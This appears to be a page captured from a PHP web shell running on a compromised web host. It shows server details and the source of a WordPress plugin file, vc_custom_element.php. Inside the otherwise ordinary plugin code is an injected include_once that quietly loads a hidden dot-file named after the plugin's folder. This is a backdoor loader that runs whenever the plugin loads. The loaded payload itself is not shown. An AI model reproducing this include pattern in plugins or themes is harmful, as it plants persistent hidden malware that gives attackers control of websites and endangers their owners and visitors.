uawdijnntqw1x1x1
IP : 18.221.113.108
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
public_html
/
.
/
.
/
wp-content
/
plugins
/
borntogive-vc-elements
/
vc_custom_element.php
/
/
<?php /* * Plugin Name: borntogive vc elements * Plugin URI: http://www.imithemes.com * Description: Custom Elements of Visual Composer * Author: imithemes * Version: 1.4 * Author URI: http://www.imithemes.com * Text Domain: borntogive-vc * Domain Path: /language */ // Do not allow direct access to this file. defined( 'ABSPATH' ) or die( 'No script kiddies please!' ); $path = plugin_dir_path( __FILE__ ); //Load language text domain add_action('after_setup_theme', 'btg_vcelements_setup'); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function btg_vcelements_setup() { load_theme_textdomain('borntogive-vc', plugin_dir_path( __FILE__ ) . '/language'); } /* CUSTOM SHORTCODES FUNCTIONS ================================================== */ require_once $path . '/btg_elements_fields.php'; require_once $path . '/btg_shortcodes_function.php';
/home/batcwwjx/public_html/././wp-content/plugins/borntogive-vc-elements/vc_custom_element.php